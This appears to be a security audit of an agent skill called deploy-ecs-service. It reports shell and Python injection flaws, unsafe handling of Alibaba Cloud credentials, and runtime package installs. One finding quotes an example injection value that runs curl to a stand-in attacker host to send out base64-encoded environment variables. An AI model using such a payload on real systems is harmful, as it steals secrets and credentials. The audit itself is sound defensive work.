The Agent Skills Directory

[COMMAND_EXECUTION]: The skill is susceptible to multiple shell command injection vulnerabilities. Variables extracted from the session context, such as DOMAIN, PROJECT_LOCAL, and SERVICE_DESC, are directly interpolated into shell commands (e.g., ssh, grep, rsync, and cat in Steps 2, 3, 6, and 8). A malicious user providing an input like "; curl attacker.com/$(env | base64) #" for the DOMAIN parameter could achieve arbitrary code execution or data exfiltration on the local machine or remote server.
[COMMAND_EXECUTION]: In Step 4, the skill generates and executes a Python script via python3 -c using direct string interpolation of parameters like ak, sk, ZONE, and RR. This pattern allows for Python code injection if the underlying variables are manipulated to break out of string literals.
[CREDENTIALS_UNSAFE]: The skill explicitly reads highly sensitive cloud credentials (ALIYUN_DNS_ACCESS_KEY_ID and ALIYUN_DNS_ACCESS_KEY_SECRET) from a local .env file. While these are used for the intended purpose of updating DNS records via the Alibaba Cloud API, the presence of command injection vulnerabilities significantly increases the risk of these credentials being harvested by an attacker.
[EXTERNAL_DOWNLOADS]: The skill attempts to install a Python package (aliyun-python-sdk-alidns) at runtime if it is missing. Although this package is the official SDK for a well-known service (Alibaba Cloud), dynamic package installation during execution is a security risk if the environment is compromised or if the package name is targeted by typosquatting in future versions of the skill.

deploy-ecs-service